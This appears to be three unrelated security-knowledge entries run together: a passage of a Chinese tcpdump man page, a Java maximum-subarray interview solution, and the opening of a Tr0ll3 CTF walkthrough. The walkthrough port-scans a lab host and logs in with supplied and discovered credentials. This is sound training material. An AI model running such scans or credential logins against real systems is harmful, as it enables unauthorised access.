逻辑 为 真, 该 主机地址 的 形式 可能 是 ``10.123'', 或者是 DECNET 主机名. [只有 配置成 运行 DECNET 的 Ultrix 系统 支持 DECNET 主机名.] .IP "\fBdecnet dst \fIhost\fR" 如果 DECNET 的 目的地址 是 .IR host , 则 逻辑 为 真. .IP "\fBdecnet host \fIhost\fR" 如果 DECNET 的 源地址 或 目的地址 是 .IR host , 则 逻辑 为 真. .IP "\fBip\fR, \fBarp\fR, \fBrarp\fR, \fBdecnet\fR" 是: .in +.5i .nf \fBether proto \fIp\fR .fi .in -.5i 的 简写 形式, 其中 \fIp\fR 为 上述 协议 的 一种. .IP "\fBlat\fR, \fBmoprc\fR, \fBmopdl\fR" 是: .in +.5i .nf \fBether proto \fIp\fR .fi .in -.5i 的 简写 形式, 其中 \fIp\fR 为 上述 协议 的 一种. 注意 \fItcpdump\fP 目前 不知道 如何 分析 这些 协议. .IP "\fBtcp\fR, \fBudp\fR, \fBicmp\fR" 是: .in +.5i .nf \fBip proto \fIp\fR .fi .in -.5i 的 简写 形式, 其中 \fIp\fR 为 上述 协议 的 一种. .IP "\fIexpr relop expr\fR" 如果 这个 关系式 成立, 则 逻辑 为 真, 其中 \fIrelop\fR 是 >, <, >=, <=, =, != 之一, \fIexpr\fR 是 数学表达式, 由 常整数(标准C语法形式), 普通的 二进制运算符 [+, -, *, /, &, |], 一个 长度运算符, 和 指定的 报文数据访问算符 组成. 要 访问 报文内 的 数据, 使用 下面的 语法: .in +.5i .nf \fIproto\fB [ \fIexpr\fB : \fIsize\fB ]\fR .fi .in -.5i \fIProto\fR 是 \fBether, fddi, ip, arp, rarp, tcp, udp, \fRor \fBicmp\fR 之一, 同时 也指出了 下标 操作 的 协议层. \fIexpr\fR 给出 字节单位 的 偏移量, 该 偏移量 相对于 指定的 协议层. \fISize\fR 是 可选项, 指出 感兴趣的 字节数; 它可以 是 1, 2, 4, 缺省为 1 字节. 由 关键字 \fBlen\fP 给出的 长度运算符 指明 报文 的 长度. 例如, `\fBether[0] & 1 != 0\fP' 捕捉 所有的 多目传送 报文. 表达式 `\fBip[0] & 0xf != 5\fP' 捕捉 所有 带 可选域 的 IP 报文. 表达式 `\fBip[6:2] & 0x1fff = 0\fP' 只捕捉 未分片 和 片偏移为0 的 数据报. 这种 检查 隐含在 \fBtcp\fP 和 \fBudp\fP 下标操作 中. 例如, \fBtcp[0]\fP 一定是 TCP \fI报头\fP 的 第一个 字节, 而不是 其中 某个 IP片 的 第一个 字节. .LP 原语 可以 用 下述 方法 结合使用: .IP 园括弧 括起来的 原语 和 操作符 (园括弧 在 Shell 中 有专用, 所以必须转义). .IP 取反操作 (`\fB!\fP' or `\fBnot\fP'). .IP 连结操作 (`\fB&&\fP' or `\fBand\fP'). .IP 或操作 (`\fB||\fP' or `\fBor\fP'). .LP 取反操作 有 最高优先级. 或操作 和 连结操作 有 相同的 优先级, 运算时 从左到右 结合. 注意 连结操作 需要 显式的 \fBand\fR 算符, 而不是 并列放置. .LP 如果 给出 标识符, 但没给 关键字, 那么 暗指 最近使用 的 关键字. 例如, .in +.5i .nf \fBnot host vs and ace\fR .fi .in -.5i 作为 .in +.5i .nf \fBnot host vs and host ace\fR .fi .in -.5i 的 简写形式, 不应该 和 .in +.5i .nf \fBnot ( host vs or ace )\fR .fi .in -.5i 混淆. .LP 表达式参数 可以 作为 单个 参数, 也可以 作为 复合参数 传给 tcpdump, 后者 更方便 一些. 一般说来, 如果 表达式 包含 Shell 元字符(metacharacter), 传递 单个 括起来 的 参数 要 容易 一些. 复合参数 在 被解析前 用 空格 联接 一起. .SH 示例 (EXAMPLES) .LP 显示 所有 进出 \fIsundown\fP 的 报文: .RS .nf \fBtcpdump host sundown\fP .fi .RE .LP 显示 \fIhelios\fR 和 主机 \fIhot\fR, \fIace\fR 之间 的 报文 传送: .RS .nf \fBtcpdump host helios and \\( hot or ace \\)\fP .fi .RE .LP 显示 \fIace\fR 和 除了 \fIhelios\fR 以外的 所有 主机 的 IP报文: .RS .nf \fBtcpdump ip host ace and not helios\fP .fi .RE .LP 显示 本地的主机 和 Berkeley的主机 之间 的 网络数据: .RS .nf .B tcpdump net ucb-ether .fi .RE .LP 显示 所有 通过 网关 \fIsnup\fP 的 ftp 报文 (注意 这个 表达式 被 单引号 括起, 防止 shell 解释 园括弧): .RS .nf .B tcpdump 'gateway snup and (port ftp or ftp-data)' .fi .RE .LP 显示 既不是 来自 本地主机, 也不是 传往 本地主机 的 网络数据 (如果 报文 通过 网关 进入 其他网络, 那么 它 绝不可能 到达 你的 本地网络). .RS .nf .B tcpdump ip and not net \fIlocalnet\fP .fi .RE .LP 显示 每个 TCP会话 的 起始 和 结束 报文 (SYN 和 FIN 报文), 而且 会话方 中 有一个 远程主机. .RS .nf .B tcpdump 'tcp[13] & 3 != 0 and not src and dst net \fIlocalnet\fP' .fi .RE .LP 显示 经过 网关 \fIsnup\fP 中 大于 576 字节的 IP 数据报: .RS .nf .B tcpdump 'gateway snup and ip[2:2] > 576' .fi .RE .LP 显示 IP 广播 或 多目传送 的 数据报, 但这些 报文 .I 不是 通过 以太广播 或 以太多目传送 形式 传送的: .RS .nf .B tcpdump 'ether[0] & 1 = 0 and ip[16] >= 224' .fi .RE .LP 显示 所有 不是 回响请求/应答 的 ICMP 报文 (也就是说, 不是 ping 报文): .RS .nf .B tcpdump 'icmp[0] != 8 and icmp[0] != 0" .fi .RE .SH 输出格式 (OUTPUT FORMAT) .LP \fItcpdump\fP 的 输出格式 取决于 协议. 下面的 描述 给出 大多数 格式 的 简要说明 和 范例. .de HD .sp 1.5 .B .. .HD 链路层报头 (Link Level Headers) .LP 如果 给出 '-e' 选项 就 显示 链路层报头. 在 以太网上, 显示 报文的 源目地址, 协议 和 报文长度. .LP 在 FDDI 网络上, '-e' 选项 导致 \fItcpdump\fP 显示出 `帧控制(frame control)' 域, 源目地址 和 报文长度. (`帧控制' 域 负责 解释 其余的 报文. 普通报文 (例如 装载 IP数据报 的 报文) 是 `异步' 报文, 优先级 介于 0 到 7 (例如, `\fBasync4\fR'). 那些 被认为 携带了 802.2 逻辑链路控制(LLC) 报文; 如果 它们 \fI不是\fR ISO 数据报 或者 所谓的 SNAP 报文, 就显示 LLC 报头. .LP \fI(注意: 以下 描述中 假设 你 熟悉 RFC-1144 中说明的 SLIP 压缩算法.)\fP .LP 在 SLIP 链路上, \fItcpdump\fP 显示出 方向指示 (``I'' 指 inbound(进入), ``O'' 指 outbound(离开)), 报文类型 和 压缩信息. 首先显示的 是 报文类型. 有三种 类型 \fIip\fP, \fIutcp\fP 和 \fIctcp\fP. 对于 \fIip\fR 报文 不再 显示 更多的 链路信息. 对于 TCP 报文, 在 类型 后面 显示 连接标识. 如果 报文 是 压缩过的, 就显示出 它的 编码报头. 这种 特殊情况 以 \fB*S+\fIn\fR 和 \fB*SA+\fIn\fR 的 形式 显示, 这里的 \fIn\fR 是 流序号 (或者 流序号 和 ack) 的 变化总量. 如果 不是 特殊情况, 就显示出 0 或 多个 变化. 变化 由 U (urgent pointer), W (window), A (ack), S (sequence number) 和 I (packet ID) 指明, 后跟 一个 变化量(+n or -n), 或者 是一个 新值(=n). 最后显示 报文中 的 数据总量, 以及 压缩报头 的 长度. .LP 例如, 下面一行 显示了 一个 传出的 压缩的 TCP 报文, 有一个 隐含的 连接标识; 确认(ack)的 变化量是 6, 流序号 增加 49, 报文ID 增加 6; 有三个字节的数据 和 六个字节 的 压缩报头: .RS .nf \fBO ctcp * A+6 S+49 I+6 3 (6)\fP .fi .RE .HD ARP/RARP 报文 .LP Arp/rarp 报文 的 输出 是 请求类型 及其 参数. 输出格式 大体上 能够 自我解释. 这里 是一个 简单的例子, 来自 主机 \fIrtsg\fP 到 主机 \fIcsam\fP 的 'rlogin' 开始 部分: .RS .nf .sp .5 \f(CWarp who-has csam tell rtsg arp reply csam is-at CSAM\fP .sp .5 .fi .RE 第一行 说明 rtsg 发出 一个 arp 报文 询问 internet 主机 csam 的 以太网地址. Csam 用 它的 以太地址 作应答 (这个例子中, 以太地址 是 大写的, internet 地址 为 小写). .LP 如果 用 \fBtcpdump \-n\fP 看 就 清楚一些: .RS .nf .sp .5 \f(CWarp who-has 128.3.254.6 tell 128.3.254.68 arp reply 128.3.254.6 is-at 02:07:01:00:01:c4\fP .fi .RE .LP 如果 用 \fBtcpdump \-e\fP, 可以 看到 实际上 第一个 报文 是 广播, 第二个 报文 是 点到点 的: .RS .nf .sp .5 \f(CWRTSG Broadcast 0806 64: arp who-has csam tell rtsg CSAM RTSG 0806 64: arp reply csam is-at CSAM\fP .sp .5 .fi .RE 这里 第一个 报文 指出 以太网源地址是 RTSG, 目的地址 是 以太网广播地址, 类型域 为 16进制数 0806 (类型 ETHER_ARP), 报文全长 64 字节. .HD TCP 报文 .LP \fI(注意: 以下的描述中 假设 你 熟悉 RFC-793 中 说明的 TCP 协议, 如果 你 不了解 这个 协议, 无论是 本文 还是 tcpdump 都对你 用处 不大)\fP .LP 一般说来 tcp 协议的 输出格式是: .RS .nf .sp .5 \fIsrc > dst: flags data-seqno ack window urgent options\fP .sp .5 .fi .RE \fISrc\fP 和 \fIdst\fP 是 源目IP地址和端口. \fIFlags\fP 是 S (SYN), F (FIN), P (PUSH) 或 R (RST) 或 单独的 `.'(无标志), 或者是 它们的 组合. \fIData-seqno\fP 说明了 本报文中的数据 在 流序号 中的 位置 (见下例). \fIAck\fP 是 在这条连接上 信源机 希望 下一个 接收的 字节的 流序号 (sequence number). \fIWindow\fP 是 在这条连接上 信源机 接收缓冲区 的 字节大小. \fIUrg\fP 表明 报文内 是 `紧急(urgent)' 数据. \fIOptions\fP 是 tcp 选项, 用 尖括号 括起 (例如, <mss 1024>). .LP \fISrc, dst\fP 和 \fIflags\fP 肯定 存在. 其他域 依据 报文的 tcp 报头 内容, 只输出 有必要 的 部分. .LP 下面 是 从 主机 \fIrtsg\fP rlogin 到 主机 \fIcsam\fP 的 开始部分. .RS .nf .sp .5 \s-2\f(CWrtsg.1023 > csam.login: S 768512:768512(0) win 4096 <mss 1024> csam.login > rtsg.1023: S 947648:947648(0) ack 768513 win 4096 <mss 1024> rtsg.1023 > csam.login: . ack 1 win 4096 rtsg.1023 > csam.login: P 1:2(1) ack 1 win 4096 csam.login > rtsg.1023: . ack 2 win 4096 rtsg.1023 > csam.login: P 2:21(19) ack 1 win 4096 csam.login > rtsg.1023: P 1:2(1) ack 21 win 4077 csam.login > rtsg.1023: P 2:3(1) ack 21 win 4077 urg 1 csam.login > rtsg.1023: P 3:4(1) ack 21 win 4077 urg 1\fP\s+2 .sp .5 .fi .RE 第一行 是说 从 rtsg 的 tcp 端口 1023 向 csam 的 \fIlogin\fP 端口 发送 报文. \fBS\fP 标志 表明 设置了 \fISYN\fP 标志. 报文 的 流序号 是 768512, 没有 数据. (这个写成 `first:last(nbytes)', 意思是 `从 流序号 \fIfirst\fP 到 \fIlast\fP, 不包括 \fIlast\fP, 有 \fInbytes\fP 字节的 用户数据'.) 此时 没有 捎带确认(piggy-backed ack), 有效的 接收窗口 是 4096 字节, 有一个 最大分段长度(max-segment-size) 的 选项, 请求 设置 mss 为 1024 字节. .LP Csam 用类似的 形式 应答, 只是 增加了 一个 对 rtsg SYN 的 捎带确认. 然后 Rtsg 确认 csam 的 SYN. `.' 意味着 没有 设置 标志. 这个 报文 不包含 数据, 因此 也就 没有 数据的流序号. 注意这个 确认流序号 是一个 小整数(1). 当 \fBtcpdump\fP 第一次 发现 一个 tcp 会话时, 它 显示 报文 携带的 流序号. 在 随后收到的 报文里, 它 显示 当前 报文 和 最初那个 报文 的 流序号 之 差. 这 意味着 从第一个报文 开始, 以后的 流序号 可以 理解成 数据流 中的 相对位移 (每个报文 的 第一个 数据字节 从 '1' 计数). `-S' 选项 能够 改变 这个 特性, 直接 显示 原始的 流序号. .LP 在 第六行, rtsg 传给 csam 19 个字节 的 数据 (字节 2 到 20). 报文中 设置了 PUSH 标志. 第七行 csam 表明 它 收到了 rtsg 的 数据, 字节序号 是 21, 但不包括 第21个 字节. 显然 大多数 数据 在 socket 的 缓冲区内, 因为 csam 的 接收窗口 收到的 数据 小于 19 个 字节. 同时 csam 向 rtsg 发送了 一个字节 的 数据. 第八和第九行 显示 csam 发送了 两个字节 的 紧急数据 到 rtsg. .LP 如果 捕捉区 设置的 过小, 以至于 \fBtcpdump\fP 不能 捕捉到 完整的 TCP 报头, \fBtcpdump\fP 会 尽可能的 翻译 已捕获的 部分, 然后 显示 ``[|\fItcp\fP]'', 表明 无法 翻译 其余 部分. 如果 报头 包含 有问题的 选项 (选项表 长度 太小 或者 超出 报头范围), tcpdump 显示 ``[\fIbad opt\fP]'' 并且 不再 翻译 其他 选项部分 (因为 它 不可能 判断出 从哪儿 开始). 如果 报头长度 表明 存在 选项, 但是 IP 数据报 长度 不够, 不可能 真的 保存 选项, tcpdump 就显示 ``[\fIbad hdr length\fP]''. .HD .B UDP 报文 .LP UDP 格式 就象 这个 rwho 报文 显示的: .RS .nf .sp .5 \f(CWactinide.who > broadcast.who: udp 84\fP .sp .5 .fi .RE 就是说 把一个 udp 数据报 从 主机 \fIactinide\fP 的 \fIwho\fP 端口 发送到 \fIbroadcast\fP, Internet 广播地址 的 \fIwho\fP 端口. 报文 包含 84字节 的 用户数据. .LP 某些 UDP 服务 能够 识别出来(从 源目端口号 上), 因而 显示出 更高层的 协议信息. 特别是 域名服务请求(RFC-1034/1035) 和 NFS 的 RPC 调用(RFC-1050). .HD UDP 名字服务请求 (Name Server Requests) .LP \fI(注意: 以下的描述中 假设 你 熟悉 RFC-1035 说明的 域名服务协议. 如果你 不熟悉 这个协议, 下面的内容 可能 看起来是 天书.)\fP .LP 名字服务请求 的 格式 是 .RS .nf .sp .5 \fIsrc > dst: id op? flags qtype qclass name (len)\fP .sp .5 \f(CWh2opolo.1538 > helios.domain: 3+ A? ucbvax.berkeley.edu. (37)\fP .sp .5 .fi .RE 主机 \fIh2opolo\fP 访问 \fIhelios\fP 上的 域名服务, 询问 和 \fIucbvax.berkeley.edu.\fP 关联的 地址记录(qtype=A). 查询号是 `3'. `+' 表明 设置了 \fI递归请求\fP 标志. 查询长度是 37 字节, 不包括 UDP 和 IP 头. 查询操作 是 普通的 \fIQuery\fP 操作, 因此 op 域 可以 忽略. 如果 op 设置成 其他什么东西, 它应该 显示在 `3' 和 `+' 之间. 类似的, qclass 是 普通的 \fIC_IN\fP 类型, 也被 忽略了. 其他类型的 qclass 应该 在 `A' 后面 显示. .LP Tcpdump 会检查 一些 不规则 情况, 相应的 结果 作为 补充域 放在 方括号内: 如果 某个 查询 包含 回答, 名字服务 或 管理机构部分, 就把 .IR ancount , .IR nscount , 或 .I arcount 显示成 `[\fIn\fPa]', `[\fIn\fPn]' 或 `[\fIn\fPau]', 这里的 \fIn\fP 代表 相应的 数量. 如果 在 第二和第三字节 中, 任何一个 回答位(AA, RA 或 rcode) 或 任何一个 `必须为零' 的位 被 置位, 就显示 `[b2&3=\fIx\fP]', 这里的 \fIx\fP 是 报头 第二和第三字节 的 16进制数. .HD UDP 名字服务回答 .LP 名字服务回答的 格式 是 .RS .nf .sp .5 \fIsrc > dst: id op rcode flags a/n/au type class data (len)\fP .sp .5 \f(CWhelios.domain > h2opolo.1538: 3 3/3/7 A 128.32.137.3 (273) helios.domain > h2opolo.1537: 2 NXDomain* 0/1/0 (97)\fP .sp .5 .fi .RE 第一个例子里, \fIhelios\fP 回答了 \fIh2opolo\fP 发出的 标识为3 的 询问, 一共是 3 个 回答记录, 3 个 名字服务记录 和 7 个管理结构记录. 第一个 回答纪录 的 类型是 A (地址), 数据是 internet 地址 128.32.137.3. 回答的 全长 为 273 字节, 不包括 UDP 和 IP 报头. 作为 A 记录的 class(C_IN) 可以 忽略 op (询问) 和 rcode (NoError). .LP 在第二个例子里, \fIhelios\fP 对 标识为2 的 询问 作出 域名不存在 (NXDomain) 的 回答, 没有 回答记录, 一个 名字服务记录, 没有 管理结构部分. `*' 表明 设置了 \fI权威回答(authoritative answer)\fP. 由于 没有 回答记录, 这里就 不显示 type, class 和 data. .LP 其他 标志 字符 可以 显示为 `\-' (\fI没有\fP设置递归有效(RA)) 和 `|' (设置 消息截短(TC)). 如果 `问题' 部分 没有 有效的 内容, 就 显示 `[\fIn\fPq]'. .LP 注意 名字服务的 询问和回答 一般说来 比较大, 68 字节的 \fIsnaplen\fP 可能 无法 捕捉到 足够的 报文内容. 如果 你 的确 在 研究 名字服务 的 情况, 可以 使用 \fB\-s\fP 选项 增大 捕捉缓冲区. `\fB\-s 128\fP' 应该 效果 不错了. .HD NFS 请求和响应 .LP Sun NFS (网络文件系统) 的 请求和响应 显示格式 是: .RS .nf .sp .5 \fIsrc.xid > dst.nfs: len op args\fP \fIsrc.nfs > dst.xid: reply stat len op results\fP .sp .5 \f(CW sushi.6709 > wrl.nfs: 112 readlink fh 21,24/10.73165 wrl.nfs > sushi.6709: reply ok 40 readlink "../var" sushi.201b > wrl.nfs: 144 lookup fh 9,74/4096.6878 "xcolors" wrl.nfs > sushi.201b: reply ok 128 lookup fh 9,74/4134.3150 \fP .sp .5 .fi .RE 在第一行, 主机 \fIsushi\fP 向 \fIwrl\fP 发送 号码为 \fI6709\fP 的 交互会话 (注意 源主机 后面的 数字 是 交互号, \fI不是\fP 端口). 这项请求 长 112 字节, 不包括 UDP 和 IP 报头. 在 文件句柄 (\fUfh\fP) 21,24/10.731657119 上执行 \fIreadlink\fP (读取 符号连接) 操作. (如果 运气 不错, 就象 这种情况, 文件句柄 可以 依次翻译成 主次设备号, i 节点号, 和 事件号(generation number). ) \fIWrl\fP 回答 `ok' 和 连接的 内容. .LP 在第三行, \fIsushi\fP 请求 \fIwrl\fP 在 目录文件 9,74/4096.6878 中 查找 `\fIxcolors\fP'. 注意 数据的 打印格式 取决于 操作类型. 格式 应该 可以 自我说明. .LP 给出 \-v (verbose) 选项 可以 显示 附加信息. 例如: .RS .nf .sp .5 \f(CW sushi.1372a > wrl.nfs: 148 read fh 21,11/12.195 8192 bytes @ 24576 wrl.nfs > sushi.1372a: reply ok 1472 read REG 100664 ids 417/0 sz 29388 \fP .sp .5 .fi .RE (\-v 同时 使它 显示 IP 报头的 TTL, ID, 和 分片域, 在 这个例子里 把它们 省略了.) 在第一行, \fIsushi\fP 请求 \fIwrl\fP 从 文件 21,11/12.195 的 偏移位置 24576 开始, 读取 8192 字节. \fIWrl\fP 回答 `ok'; 第二行 显示的 报文 是 应答的 第一个 分片, 因此 只有 1472 字节 (其余数据 在 后续的 分片中 传过来, 但由于 这些分片里 没有 NFS 甚至 UDP 报头, 因此 根据 所使用的 过滤器表达式, 有可能 不再显示). \-v 选项 还会 显示 一些 文件属性 (它们 作为 文件数据 的 附带部分 传回来): 文件类型 (普通文件 ``REG''), 存取模式 (八进制数), uid 和 gid, 以及 文件大小. .LP 如果再给一个 \-v 选项 (\-vv), 还能 显示 更多的细节. .LP 注意 NFS 请求 的 数据量 非常大, 除非 增加 \fIsnaplen\fP, 否则 很多细节 无法显示. 试一试 `\fB\-s 192\fP' 选项. .LP NFS 应答报文 没有明确 标明 RPC 操作. 因此 \fItcpdump\fP 保留有 ``近来的'' 请求 记录, 根据 交互号 匹配 应答报文. 如果 应答报文 没有 相应的 请求报文, 它 就 无法分析. .HD KIP Appletalk (UDP 上的 DDP) .LP Appletalk DDP 报文 封装在 UDP 数据报 中, 解包后 按 DDP 报文 转储 (也就是说, 忽略 所有的 UDP 报头 信息). 文件 .I /etc/atalk.names 用来 把 appletalk 网络和节点号 翻译成 名字. 这个文件 的 行格式 是 .RS .nf .sp .5 \fInumber name\fP \f(CW1.254 ether 16.1 icsd-net 1.254.110 ace\fP .sp .5 .fi .RE 前两行 给出了 appletalk 的 网络名称. 第三行 给出 某个主机 的 名字 (主机和网络 依据 第三组 数字 区分 \- 网络号 \fI一定\fP 是 两组数字, 主机号 \fI一定\fP 是 三组 数字.) 号码 和 名字 用 空白符(空格或tab) 隔开. .I /etc/atalk.names 文件 可以 包含 空行 或 注释行(以`#'开始的行). .LP Appletalk 地址 按 这个格式 显示 .RS .nf .sp .5 \fInet.host.port\fP \f(CW144.1.209.2 > icsd-net.112.220 office.2 > icsd-net.112.220 jssmag.149.235 > icsd-net.2\fP .sp .5 .fi .RE (如果 不存在 .I /etc/atalk.names , 或者 里面 缺少 有效项目, 就以 数字形式 显示 地址.) 第一个例子里, 网络 144.1 的 209 节点的 NBP (DDP 端口 2) 向 网络 icsd 的 112 节点 的 220 端口 发送数据. 第二行 和 上面 一样, 只是 知道了 源节点 的 全称 (`office'). 第三行 是从 网络 jssmag 的 149 节点 的 235 端口 向 icsd-net 的 NBP 端口 广播 (注意 广播地址 (255) 隐含在 无主机号的 网络名字 中 \- 所以 在 /etc/atalk.names 中 区分 节点名 和 网络名 是个 好主意). .LP Tcpdump 可以 翻译 NBP (名字联结协议) 和 ATP (Appletalk 交互协议) 的 报文 内容. 其他协议 只转储 协议名称 (或号码, 如果 还 没给 这个协议 注册 名称) 和 报文大小. \fBNBP 报文\fP 的 输出格式 就象 下面的 例子: .RS .nf .sp .5 \s-2\f(CWicsd-net.112.220 > jssmag.2: nbp-lkup 190: "=:LaserWriter@*" jssmag.209.2 > icsd-net.112.220: nbp-reply 190: "RM1140:LaserWriter@*" 250 techpit.2 > icsd-net.112.220: nbp-reply 190: "techpit:LaserWriter@*" 186\fP\s+2 .sp .5 .fi .RE 第一行 是 网络 icsd 的 112 主机 在 网络 jssmag 上的 广播, 对 名字 laserwriter 做 名字查询请求. 名字查询请求 的 nbp 标识号 是 190. 第二行 显示的是 对 这个请求 的 回答 (注意 它们 有 同样的 标识号), 主机 jssmag.209 表示 在它的 250 端口 注册了 一个 laserwriter 的 资源, 名字是 "RM1140". 第三行 是 这个请求 的 其他回答, 主机 techpit 的 186 端口 有 laserwriter 注册的 "techpit". \fBATP 报文\fP 格式 如 下例 所示: .RS .nf .sp .5 \s-2\f(CWjssmag.209.165 > helios.132: atp-req 12266<0-7> 0xae030001 helios.132 > jssmag.209.165: atp-resp 12266:0 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:1 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:2 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:3 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:4 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:5 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:6 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp*12266:7 (512) 0xae040000 jssmag.209.165 > helios.132: atp-req 12266<3,5> 0xae030001 helios.132 > jssmag.209.165: atp-resp 12266:3 (512) 0xae040000 helios.132 > jssmag.209.165: atp-resp 12266:5 (512) 0xae040000 jssmag.209.165 > helios.132: atp-rel 12266<0-7> 0xae030001 jssmag.209.133 > helios.132: atp-req* 12267<0-7> 0xae030002\fP\s+2 .sp .5 .fi .RE Jssmag.209 向 主机 helios 发起 12266 号 交互操作, 请求 8 个 报文(`<0-7>'). 行尾的 十六进制数 是 请求中 `userdata' 域 的 值. .LP Helios 用 8 个 512字节 的 报文 应答. 跟在 交互号 后面的 `:digit' 给出了 交互过程中 报文的 序列号, 括弧内的 数字 是 报文的 数据量, 不包括 atp 报头. 报文 7 的 `*' 表明 设置了 EOM 位. .LP 然后 Jssmag.209 请求 重传 第 3 & 5 报文. Helios 做了 重传后 jssmag.209 结束 这次 交互操作. 最后, jssmag.209 发起 下一次 交互请求. 请求中的 `*' 表明 \fI没有\fP 设置 XO (exactly once) 位. .HD IP 分片 .LP 分片的 Internet 数据报 显示为 .RS .nf .sp .5 \fB(frag \fIid\fB:\fIsize\fB@\fIoffset\fB+)\fR \fB(frag \fIid\fB:\fIsize\fB@\fIoffset\fB)\fR .sp .5 .fi .RE (第一种 形式 表明 还有 更多的 分片. 第二种 形式 表明 这是 最后 一片.) .LP \fIId\fP 是 分片 标识号. \fISize\fP 是 分片 大小 (字节), 不包括 IP 报头. \fIOffset\fP 是 该分片 在 原数据报 中 的 偏移 (单位是字节). .LP 每一个 分片 的 信息 都可以 打印出来. 第一个 分片 包含了 高层 协议 报头, 显示 协议信息 后 显示 分片 的 信息. 第一个 分片 以后的 分片 不再 含有 高层协议 报头, 所以 在 源目地址 后面 只显示 分片 信息. 例如, 下面是 从 arizona.edu 到 lbl-rtsg.arpa 的 一部分 ftp 传输, 途经的 CSNET 看上去 处理不了 576 字节的 数据报: .RS .nf .sp .5 \s-2\f(CWarizona.ftp-data > rtsg.1170: . 1024:1332(308) ack 1 win 4096 (frag 595a:328@0+) arizona > rtsg: (frag 595a:204@328) rtsg.1170 > arizona.ftp-data: . ack 1536 win 2560\fP\s+2 .sp .5 .fi .RE 这里 有几点 需要注意: 首先, 第二行的 地址 不包括 端口号. 这是因为 TCP 协议 信息 全部 装到了 第一个 分片内, 所以 显示 后续分片的 时候 不可能 知道 端口 或 流序号. 其次, 第一行的 tcp 流序号部分 看上去有 308 字节的 用户数据, 实际上 是 512 字节 (第一个 分片的 308 和 第二个 分片的 204 字节). 如果 你 正在 寻找 流序号中 的 空洞, 或者 试图 匹配 报文 的 确认(ack), 那你上当了. .LP 如果 报文的 IP 标有 \fI不要分片\fP 标志, 那么 在尾部 显示 \fB(DF)\fP. .HD 时戳 .LP 缺省情况下, 所有 输出行 的 前面 都有 时戳. 时戳 就是 当前时间, 显示格式为 .RS .nf \fIhh:mm:ss.frac\fP .fi .RE 精度 和 内核时钟 一样. 时戳 反映了 内核 收到 报文 的 时间. 从 以太接口 收到 报文 到 内核 响应 '报文就绪' 中断 有一个 滞后, 该 滞后 不被考虑. .SH "另见 (SEE ALSO)" traffic(1C), nit(4P), bpf(4), pcap(3) .SH 作者 (AUTHORS) Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. .LP 当前 版本 可以 从 匿名ftp 获得: .LP .RS .I ftp://ftp.ee.lbl.gov/tcpdump.tar.Z .RE .SH BUGS 请把 臭虫 报告 传往 tcpdump@ee.lbl.gov. .LP NIT 不允许 监视 你自己的 传出数据, BPF 可以. 我们 建议 你 使用 后者. .LP 应该 试着 重组 IP 分片, 至少可以 为 更高层的 协议 计算出 正确的 长度. .LP 名字服务逆向询问 转储的 不正确: 打印出 (空的)问题部分, 而实际上 询问 放在了 回答部分. 有人 认为 这种 逆向询问 本身就是 bug, 应该 修改 产生问题 的 程序, 而非 tcpdump. .LP 苹果 Ethertalk DDP 的 报文 应该 象 KIP DDP 的 报文 一样 容易 转储, 事实 却 不是 这样. 即使 我们 有意 作点什么 来 促销 Ethertalk (我们没有), LBL 也不允许 Ethertalk 出现在 它的 任何网络上, 所以 我们 没办法 测试 这些代码. .LP 如果 报文的 路径上 出现 夏时制时间 变化, 可能 导致 时戳 混乱. (这个时间变化将忽略) .LP 操作 FDDI 报头的 过滤器表达式 假设 所有的 FDDI 报文 被封装在 以太报文 中. 这对 IP, ARP 和 DECNET Phase IV 无疑是 正确的, 但对 某些 协议 如 ISO CLNS 不正确. 因此, 过滤器 有可能会 糊里糊涂的 的 接收 一些 并不真正 匹配 过滤器表达式 的 报文. .SH "[中文版维护人]" .B 徐明 <xuming@users.sourceforge.net> .SH "[中文版最新更新]" .BR 2003/05/13 .SH "《中国Linux论坛man手册页翻译计划》" .BI http://cmpp.linuxforum.net
sec-knowleage
# 42. 连续子数组的最大和 [NowCoder](https://www.nowcoder.com/practice/459bd355da1549fa8a49e350bf3df484?tpId=13&tqId=11183&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 {6, -3, -2, 7, -15, 1, 2, 2},连续子数组的最大和为 8(从第 0 个开始,到第 3 个为止)。 ## 解题思路 ```java public int FindGreatestSumOfSubArray(int[] nums) { if (nums == null || nums.length == 0) return 0; int greatestSum = Integer.MIN_VALUE; int sum = 0; for (int val : nums) { sum = sum <= 0 ? val : sum + val; greatestSum = Math.max(greatestSum, sum); } return greatestSum; } ```
sec-knowleage
# Troll 3 > https://download.vulnhub.com/tr0ll/Tr0ll3.ova > > ssh:`start:here` 靶场IP:`192.168.32.174` ![image-20220718141329252](../../.gitbook/assets/image-20220718141329252.png) 扫描对外端口 ``` ┌──(root💀kali)-[~/Desktop] └─# nmap -p1-65535 192.168.32.174 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-18 02:13 EDT Nmap scan report for 192.168.32.174 Host is up (0.00073s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh MAC Address: 00:0C:29:BB:B3:A9 (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds ``` 直接SSH登录 ![image-20220718141526812](../../.gitbook/assets/image-20220718141526812.png) 查看当前目录信息 ``` start@Tr0ll3:~$ ls bluepill redpill start@Tr0ll3:~$ cd bluepill/ start@Tr0ll3:~/bluepill$ ls awesome_work start@Tr0ll3:~/bluepill$ cat awesome_work http://bfy.tw/ODa start@Tr0ll3:~/bluepill$ cd ~/redpill/ start@Tr0ll3:~/redpill$ ls this_will_surely_work start@Tr0ll3:~/redpill$ cat this_will_surely_work step2:Password1! start@Tr0ll3:~/redpill$ ``` 该文件`awesome_work`只包含 URL http://bfy.tw/ODa。如果我们访问给定的链接,我们将被转发到_www.lmgtfy.com_(让我为你谷歌一下),并询问"你如何让黑客浪费时间"。所以很明显,这条线索是一条死胡同,被放在那里是开玩笑的。 随着故事的进展,我们一次又一次地看到类似的信息,只是为了分散注意力。这台机器名副其实,并在任何可能的地方"控制"我们。 